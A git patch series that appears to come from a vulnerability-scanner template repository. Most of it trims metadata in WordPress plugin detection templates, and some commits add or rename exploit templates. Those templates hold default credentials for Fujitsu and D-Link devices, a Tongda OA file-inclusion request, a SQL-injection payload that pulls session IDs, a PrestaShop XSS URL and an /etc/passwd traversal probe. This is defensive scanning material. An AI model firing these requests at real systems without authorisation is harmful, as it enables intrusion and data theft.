c25b2c1c48..6786cab703 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wordpress-importer/ metadata: - max-request: 1 plugin_namespace: wordpress-importer wpscan: https://wpscan.com/plugin/wordpress-importer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 4d6dd14d25..784ba22c8a 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wordpress-seo/ metadata: - max-request: 1 plugin_namespace: wordpress-seo wpscan: https://wpscan.com/plugin/wordpress-seo tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index 7ca0870ed6..72ff55e58a 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/worker/ metadata: - max-request: 1 plugin_namespace: worker wpscan: https://wpscan.com/plugin/worker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index 4f0d9be568..8cfaa0f5a9 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-fastest-cache/ metadata: - max-request: 1 plugin_namespace: wp-fastest-cache wpscan: https://wpscan.com/plugin/wp-fastest-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index f3c481b824..85900a01a7 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-file-manager/ metadata: - max-request: 1 plugin_namespace: wp-file-manager wpscan: https://wpscan.com/plugin/wp-file-manager tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index ba214fd7ea..a7ccde0b49 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-google-maps/ metadata: - max-request: 1 plugin_namespace: wp-google-maps wpscan: https://wpscan.com/plugin/wp-google-maps tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index 8f5fe8d9a5..422664a98c 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-mail-smtp/ metadata: - max-request: 1 plugin_namespace: wp-mail-smtp wpscan: https://wpscan.com/plugin/wp-mail-smtp tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index 0458b13354..f0af3a748a 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-maintenance-mode/ metadata: - max-request: 1 plugin_namespace: wp-maintenance-mode wpscan: https://wpscan.com/plugin/wp-maintenance-mode tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index d570be07bf..f89f1a20b3 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-migrate-db/ metadata: - max-request: 1 plugin_namespace: wp-migrate-db wpscan: https://wpscan.com/plugin/wp-migrate-db tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index ee05e3add8..01fb12d0ad 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-multibyte-patch/ metadata: - max-request: 1 plugin_namespace: wp-multibyte-patch wpscan: https://wpscan.com/plugin/wp-multibyte-patch tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index df2487955f..1773857e15 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-optimize/ metadata: - max-request: 1 plugin_namespace: wp-optimize wpscan: https://wpscan.com/plugin/wp-optimize tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index 79ff01211c..bcd1509c68 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-pagenavi/ metadata: - max-request: 1 plugin_namespace: wp-pagenavi wpscan: https://wpscan.com/plugin/wp-pagenavi tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index 23414b3d1d..c6aca20a60 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-reset/ metadata: - max-request: 1 plugin_namespace: wp-reset wpscan: https://wpscan.com/plugin/wp-reset tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml index fba45020e4..56dfdf4a59 100644 --- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml +++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-reviews-plugin-for-google/ metadata: - max-request: 1 plugin_namespace: wp-reviews-plugin-for-google wpscan: https://wpscan.com/plugin/wp-reviews-plugin-for-google tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index 0178c8e9fb..810fc82cde 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-rollback/ metadata: - max-request: 1 plugin_namespace: wp-rollback wpscan: https://wpscan.com/plugin/wp-rollback tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index a04ddc6003..783d381ed8 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-sitemap-page/ metadata: - max-request: 1 plugin_namespace: wp-sitemap-page wpscan: https://wpscan.com/plugin/wp-sitemap-page tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 2ead906817..8bdc600063 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-smushit/ metadata: - max-request: 1 plugin_namespace: wp-smushit wpscan: https://wpscan.com/plugin/wp-smushit tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index dedd2e23b6..ab61cc0338 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-statistics/ metadata: - max-request: 1 plugin_namespace: wp-statistics wpscan: https://wpscan.com/plugin/wp-statistics tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 03cd7137a8..5f6fbc1f75 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-super-cache/ metadata: - max-request: 1 plugin_namespace: wp-super-cache wpscan: https://wpscan.com/plugin/wp-super-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-user-avatar.yaml b/http/technologies/wordpress/plugins/wp-user-avatar.yaml index a68d4b7d78..d67150d038 100644 --- a/http/technologies/wordpress/plugins/wp-user-avatar.yaml +++ b/http/technologies/wordpress/plugins/wp-user-avatar.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-user-avatar/ metadata: - max-request: 1 plugin_namespace: wp-user-avatar wpscan: https://wpscan.com/plugin/wp-user-avatar tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index bf9dfc3ad8..beeba7ca69 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wpcf7-recaptcha/ metadata: - max-request: 1 plugin_namespace: wpcf7-recaptcha wpscan: https://wpscan.com/plugin/wpcf7-recaptcha tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index 47911a86a5..c225df7bfd 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wpcf7-redirect/ metadata: - max-request: 1 plugin_namespace: wpcf7-redirect wpscan: https://wpscan.com/plugin/wpcf7-redirect tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index 1c25b6f488..aaad04cb76 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wpforms-lite/ metadata: - max-request: 1 plugin_namespace: wpforms-lite wpscan: https://wpscan.com/plugin/wpforms-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index b36317acd8..ff750a7d2a 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wps-hide-login/ metadata: - max-request: 1 plugin_namespace: wps-hide-login wpscan: https://wpscan.com/plugin/wps-hide-login tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index 5eb35dd17e..f1e7595ccd 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wpvivid-backuprestore/ metadata: - max-request: 1 plugin_namespace: wpvivid-backuprestore wpscan: https://wpscan.com/plugin/wpvivid-backuprestore tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index ceb2b8d600..4b2769ee46 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/yith-woocommerce-wishlist/ metadata: - max-request: 1 plugin_namespace: yith-woocommerce-wishlist wpscan: https://wpscan.com/plugin/yith-woocommerce-wishlist tags: tech,wordpress,wp-plugin,top-100,top-200 From dbd08c0242a7ac68c8eaca821a3dec5a973a71c4 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Thu, 7 Sep 2023 11:16:10 +0530 Subject: [PATCH 0209/1090] Update CVE-2023-38433.yaml --- network/cves/2023/CVE-2023-38433.yaml | 19 +++++++++++++------ 1 file changed, 13 insertions(+), 6 deletions(-) diff --git a/network/cves/2023/CVE-2023-38433.yaml b/network/cves/2023/CVE-2023-38433.yaml index bb23e63336..82a03dc7b6 100644 --- a/network/cves/2023/CVE-2023-38433.yaml +++ b/network/cves/2023/CVE-2023-38433.yaml @@ -19,18 +19,25 @@ info: metadata: max-req: 2 shodan-query: '"Server: thttpd/2.25b 29dec2003" content-length:1133' - tags: cve,cve2023,panel,login,backdoor + verified: true + tags: cve,cve2023,fujitsu,ip-series http: - raw: - | GET /b_download/index.html HTTP/1.1 Host: {{Hostname}} - Authorization: Basic {{base64('fedish264pro:h264pro@broadsight')}} - - | - GET /b_download/index.html HTTP/1.1 - Host: {{Hostname}} - Authorization: Basic {{base64('fedish265pro:h265pro@broadsight')}} + Authorization: Basic {{base64(username + ':' + password)}} + + attack: pitchfork + payloads: + username: + - fedish264pro + - fedish265pro + password: + - h264pro@broadsight + - h265pro@broadsight + matchers-condition: and matchers: - type: word From 048a217258a40cd66abfec9643fb366f37a1f361 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Thu, 7 Sep 2023 11:21:16 +0530 Subject: [PATCH 0210/1090] Update dxplanning-panel.yaml --- http/exposed-panels/dxplanning-panel.yaml | 6 ++---- 1 file changed, 2 insertions(+), 4 deletions(-) diff --git a/http/exposed-panels/dxplanning-panel.yaml b/http/exposed-panels/dxplanning-panel.yaml index 1baa1d535b..74fb85cec7 100644 --- a/http/exposed-panels/dxplanning-panel.yaml +++ b/http/exposed-panels/dxplanning-panel.yaml @@ -16,16 +16,14 @@ info: http: - method: GET path: - - '{{BaseURL}}/' - '{{BaseURL}}/DxPlanning/WebBooking/Version' - host-redirects: true - max-redirects: 2 matchers-condition: and matchers: - type: dsl dsl: - - "contains(tolower(body), 'dxplanning/webbooking/') && status_code==200" + - "contains(tolower(body), 'dxplanning/webbooking/')" + - "status_code==200" condition: and extractors: From 2fdf8dbf607f44b77b950b0ec9122f0718c5a1b5 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 7 Sep 2023 12:36:21 +0530 Subject: [PATCH 0211/1090] Changes --- ...ized-management-system-default-login.yaml} | 24 +++++++---- .../tongda/tongda-getway-rfi.yaml | 42 +++++++++++++++++++ .../tongda/tongda-insert-sqli.yaml | 35 ++++++++++++++++ ...yaml => tongda-login-code-authbypass.yaml} | 16 ++++--- .../tongda-oa-getway-remote-file-include.yaml | 31 -------------- .../tongda/tongda-oa-insert-sqli.yaml | 33 --------------- 6 files changed, 102 insertions(+), 79 deletions(-) rename http/default-logins/d-link/{d-link-ac-centralized-management-system-default-login.yaml => dlink-ac-centralized-management-system-default-login.yaml} (58%) create mode 100755 http/vulnerabilities/tongda/tongda-getway-rfi.yaml create mode 100755 http/vulnerabilities/tongda/tongda-insert-sqli.yaml rename http/vulnerabilities/tongda/{tongda-oa-login-code-arbitrary-login.yaml => tongda-login-code-authbypass.yaml} (63%) delete mode 100755 http/vulnerabilities/tongda/tongda-oa-getway-remote-file-include.yaml delete mode 100755 http/vulnerabilities/tongda/tongda-oa-insert-sqli.yaml diff --git a/http/default-logins/d-link/d-link-ac-centralized-management-system-default-login.yaml b/http/default-logins/d-link/dlink-ac-centralized-management-system-default-login.yaml similarity index 58% rename from http/default-logins/d-link/d-link-ac-centralized-management-system-default-login.yaml rename to http/default-logins/d-link/dlink-ac-centralized-management-system-default-login.yaml index 7ff252b106..b825c273b8 100755 --- a/http/default-logins/d-link/d-link-ac-centralized-management-system-default-login.yaml +++ b/http/default-logins/d-link/dlink-ac-centralized-management-system-default-login.yaml @@ -1,14 +1,16 @@ -id: d-link-ac-centralized-management-system-default-login +id: dlink-ac-centralized-management-system-default-login info: - name: D-Link AC Centralized management system Default weak password + name: D-Link AC Centralized Management System - Default Login author: SleepingBag945 - severity: medium + severity: high description: | - Access to sensitive information + D-Link AC Centralized Management System default login credentials were discovered. metadata: + max-request: 1 + verified: true fofa-query: title="AC集中管理平台" && body="D-Link路由器管理页" - tags: Default weak password + tags: default-login,dlink http: - raw: @@ -17,8 +19,14 @@ http: Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - user=admin&password=admin + user={{username}}&password={{password}} + attack: pitchfork + payloads: + username: + - admin + password: + - admin matchers-condition: and matchers: @@ -38,6 +46,4 @@ http: part: body words: - "window.open" - condition: and - - + condition: and \ No newline at end of file diff --git a/http/vulnerabilities/tongda/tongda-getway-rfi.yaml b/http/vulnerabilities/tongda/tongda-getway-rfi.yaml new file mode 100755 index 0000000000..4ffdd9da1c --- /dev/null +++ b/http/vulnerabilities/tongda/tongda-getway-rfi.yaml @@ -0,0 +1,42 @@ +id: tongda-getway-rfi + +info: + name: Tongda OA v11.8 getway.php - Remote File Inclution + author: SleepingBag945,pussycat0x + severity: critical + description: | + There is a file inclusion vulnerability in Tongda OA v11.8 getway.php, an attacker sends a malicious request to include a log file, resulting in an arbitrary file writing vulnerability + reference: + - https://github.com/Threekiii/Awesome-POC/blob/master/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E9%80%9A%E8%BE%BEOA%20v11.8%20getway.php%20%E8%BF%9C%E7%A8%8B%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E.md + metadata: + max-request: 1 + fofa-query: app="TDXK-通达OA" + verified: true + tags: tongda,rfi + +http: + - raw: + - | + POST /ispirit/interface/gateway.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + Accept-Encoding: gzip + + json={"url":"/general/../../nginx/logs/oa.access.log"} + + - | + POST /mac/gateway.php HTTP/1.1 + Host: {{Hostname}} + Content-Length: 54 + Content-Type: application/x-www-form-urlencoded + Accept-Encoding: gzip + + json={"url":"/general/../../nginx/logs/oa.access.log"} + + matchers: + - type: dsl + dsl: + - 'contains(body_1, "ERROR URL")' + - "contains(body_2, 'GET') || contains(body_2, 'POST')" + - 'status_code_1==200 && status_code_2 == 200' + condition: and \ No newline at end of file diff --git a/http/vulnerabilities/tongda/tongda-insert-sqli.yaml b/http/vulnerabilities/tongda/tongda-insert-sqli.yaml new file mode 100755 index 0000000000..e00ff40012 --- /dev/null +++ b/http/vulnerabilities/tongda/tongda-insert-sqli.yaml @@ -0,0 +1,35 @@ +id: tongda-insert-sqli + +info: + name: Tongda OA v11.6 Insert Parameter - SQL Injection + author: SleepingBag945 + severity: high + description: | + Tongda OA v11.6 insert parameters contain SQL injection vulnerabilities, through which attackers can obtain sensitive database information + reference: + - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E9%80%9A%E8%BE%BEOA/%E9%80%9A%E8%BE%BEOA%20v11.6%20insert%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md + metadata: + max-request: 1 + fofa-query: app="TDXK-通达OA" + verified: true + tags: tongda,sqli + +http: + - raw: + - | + POST /general/document/index.php/recv/register/insert HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + title)values("'"^exp(if(ascii(substr(MOD(5,2),1,1))<128,1,710)))# =1&_SERVER= + + + matchers-condition: and + matchers: + - type: word + part: header + words: + - "PHPSESSID=" + - type: status + status: + - 302 \ No newline at end of file diff --git a/http/vulnerabilities/tongda/tongda-oa-login-code-arbitrary-login.yaml b/http/vulnerabilities/tongda/tongda-login-code-authbypass.yaml similarity index 63% rename from http/vulnerabilities/tongda/tongda-oa-login-code-arbitrary-login.yaml rename to http/vulnerabilities/tongda/tongda-login-code-authbypass.yaml index 01993880a8..fb1b5fb5ea 100755 --- a/http/vulnerabilities/tongda/tongda-oa-login-code-arbitrary-login.yaml +++ b/http/vulnerabilities/tongda/tongda-login-code-authbypass.yaml @@ -1,12 +1,17 @@ -id: tongda-oa-login-code-arbitrary-login +id: tongda-login-code-authbypass info: - name: tongda-oa-login-code-arbitrary-login + name: Tongda OA v11.8 logincheck_code.php - Authentication Bypass author: SleepingBag945 severity: high - description: 通达OA是一套办公系统。2020年04月17日, 通达OA官方在更新了一个v11版本安全补丁, 其中修复了一个任意用户伪造登录漏洞。 该漏洞类型为任意用户伪造,未经授权的远程攻击者可以通过精心构造的请求包进行任意用户伪造登录.登录之后可进一步上传恶意文件控制网站服务器。 + description: | + There is a login bypass vulnerability in Tongda OA v11.8 logincheck_code.php, through which an attacker can log in to the system administrator background reference: - - http://wiki.peiqi.tech/wiki/oa/通达OA/通达OA%20v11.5%20login_code.php%20任意用户登录.html - tags: tongda,oa + - https://github.com/Threekiii/Awesome-POC/blob/master/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E9%80%9A%E8%BE%BEOA%20v11.5%20logincheck_code.php%20%E7%99%BB%E9%99%86%E7%BB%95%E8%BF%87%E6%BC%8F%E6%B4%9E.md + metadata: + max-request: 3 + fofa-query: app="TDXK-通达OA" + verified: true + tags: tongda,authbypass http: - raw: @@ -41,7 +46,6 @@ http: regex: - 'PHPSESSID=(.*?);' - req-condition: true matchers: - type: dsl dsl: diff --git a/http/vulnerabilities/tongda/tongda-oa-getway-remote-file-include.yaml b/http/vulnerabilities/tongda/tongda-oa-getway-remote-file-include.yaml deleted file mode 100755 index 00c1c6262a..0000000000 --- a/http/vulnerabilities/tongda/tongda-oa-getway-remote-file-include.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: tongda-oa-getway-remote-file-include - -info: - name: tongda-oa-getway-remote-file-include - author: SleepingBag945 - severity: critical - description: 通达OA v11.8 getway.php 存在文件包含漏洞,攻击者通过发送恶意请求包含日志文件导致任意文件写入漏洞 - reference: - - http://wiki.peiqi.tech/wiki/oa/通达OA/通达OA%20v11.8%20getway.php%20远程文件包含漏洞.html - tags: tongda,oa - -http: - - raw: - - | - POST /ispirit/interface/gateway.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - Accept-Encoding: gzip - - json={"url":"/general/../../nginx/logs/oa.access.log"} - - - - matchers-condition: and - matchers: - - type: word - words: - - "ERROR URL" - - type: status - status: - - 200 diff --git a/http/vulnerabilities/tongda/tongda-oa-insert-sqli.yaml b/http/vulnerabilities/tongda/tongda-oa-insert-sqli.yaml deleted file mode 100755 index 6d606b493c..0000000000 --- a/http/vulnerabilities/tongda/tongda-oa-insert-sqli.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: tongda-oa-insert-sqli - -info: - name: tongda-oa-insert-sqli - author: SleepingBag945 - severity: high - description: 通达OA v11.6 insert参数包含SQL注入漏洞,攻击者通过漏洞可获取数据库敏感信息 - reference: - - http://wiki.peiqi.tech/wiki/oa/通达OA/通达OA%20v11.6%20insert%20SQL注入漏洞.html - tags: tongda,oa,info - -http: - - raw: - - | - POST /general/document/index.php/recv/register/insert HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - title)values("'"^exp(if(ascii(substr(MOD(5,2),1,1))<128,1,710)))# =1&_SERVER= - - - matchers-condition: and - matchers: - - type: word - part: header - words: - - "PHPSESSID=" - - type: status - status: - - 302 - - -#exp title)values("'"^exp(if(ascii(substr((select/**/SID/**/from/**/user_online/**/limit/**/0,1),8,1))<66,1,710)))# =1&_SERVER= \ No newline at end of file From dad997b818435cc3596f3c7f12ec34b03dfc0823 Mon Sep 17 00:00:00 2001 From: meme-lord <meme-lord@users.noreply.github.com> Date: Thu, 7 Sep 2023 10:43:17 +0100 Subject: [PATCH 0212/1090] added template for CVE-2023-39676 FieldPopupNewsletter XSS --- http/cves/2023/CVE-2023-39676.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 http/cves/2023/CVE-2023-39676.yaml diff --git a/http/cves/2023/CVE-2023-39676.yaml b/http/cves/2023/CVE-2023-39676.yaml new file mode 100644 index 0000000000..97cfb6b967 --- /dev/null +++ b/http/cves/2023/CVE-2023-39676.yaml @@ -0,0 +1,27 @@ +id: CVE-2023-39676 +info: + name: PrestaShop XSS in fieldpopupnewsletter module + author: meme-lord + severity: medium + description: PrestaShop module fieldpopupnewsletter is vulnerable to XSS + reference: + - https://blog.sorcery.ie/posts/fieldpopupnewsletter_xss/ + tags: cve,cve2023,prestashop,xss + +http: + - method: GET + path: + - "{{BaseURL}}/modules/fieldpopupnewsletter/ajax.php?callback=%3Cscript%3Ealert(0)%3C/script%3E" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: body + words: + - "<script>alert(0)</script>" + - "Invalid email" + condition: and From a6160f2786e1eba34d8a0ab9c27d3f60863035c8 Mon Sep 17 00:00:00 2001 From: J4vaovo <128683738+j4vaovo@users.noreply.github.com> Date: Fri, 8 Sep 2023 11:01:28 +0800 Subject: [PATCH 0213/1090] Create honeypot-detect.yaml --- http/technologies/honeypot-detect.yaml | 32 ++++++++++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 http/technologies/honeypot-detect.yaml diff --git a/http/technologies/honeypot-detect.yaml b/http/technologies/honeypot-detect.yaml new file mode 100644 index 0000000000..ce207cd385 --- /dev/null +++ b/http/technologies/honeypot-detect.yaml @@ -0,0 +1,32 @@ +id: honeypot-detect + +info: + name: Honeypot Detection + author: j4vaovo + severity: info + description: Honeypot Detection. + tags: honeypot,tech + metadata: + max-request: 1 + +variables: + rand1: "{{randstr}}" + rand2: "{{rand_int(11111, 99999)}}" + rand3: "{{randstr}}" + +http: + - raw: + - | + GET /?{{rand1}}=../../../../../../../../etc/passwd&{{rand3}}=1%20and%20updatexml(1,concat(0x7e,(select%20md5({{rand2}}))),1) HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: or + matchers: + - type: regex + regex: + - "root:[x*]:0:0" + + - type: word + part: body + words: + - '{{md5({{rand2}})}}' From 3746ff74243d95cf3d3cc13dd2043176cef864c3 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Fri, 8 Sep 2023 04:02:21 +0000 Subject: [PATCH 0214/1090] Auto WordPress Plugins Update [Fri Sep 8 04:02:21 UTC 2023] :robot: --- helpers/wordpress/plugins/advanced-custom-fields.txt | 2 +- helpers/wordpress/plugins/coblocks.txt | 2 +- .../wordpress/plugins/essential-addons-for-elementor-lite.txt | 2 +- helpers/wordpress/plugins/ewww-image-optimizer.txt | 2 +- helpers/wordpress/plugins/seo-by-rank-math.txt | 2 +- .../wordpress/plugins/all-404-redirect-to-homepage.yaml | 1 - 6 files changed, 5 insertions(+), 6 deletions(-) diff --git a/helpers/wordpress/plugins/advanced-custom-fields.txt b/helpers/wordpress/plugins/advanced-custom-fields.txt index 4ac4fded49..0df17dd0f6 100644 --- a/helpers/wordpress/plugins/advanced-custom-fields.txt +++ b/helpers/wordpress/plugins/advanced-custom-fields.txt @@ -1 +1 @@ -6.2.0 \ No newline at end of file +6.2.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/coblocks.txt b/helpers/wordpress/plugins/coblocks.txt index 711ee4f504..b532f3dc33 100644 --- a/helpers/wordpress/plugins/coblocks.txt +++ b/helpers/wordpress/plugins/coblocks.txt @@ -1 +1 @@ -3.1.3 \ No newline at end of file +3.1.4 \ No newline at end of file diff --git a/helpers/wordpress/plugins/essential-addons-for-elementor-lite.txt b/helpers/wordpress/plugins/essential-addons-for-elementor-lite.txt index 97276d1dee..6f4fe76b09 100644 --- a/helpers/wordpress/plugins/essential-addons-for-elementor-lite.txt +++ b/helpers/wordpress/plugins/essential-addons-for-elementor-lite.txt @@ -1 +1 @@ -5.8.7 \ No newline at end of file +5.8.8 \ No newline at end of file diff --git 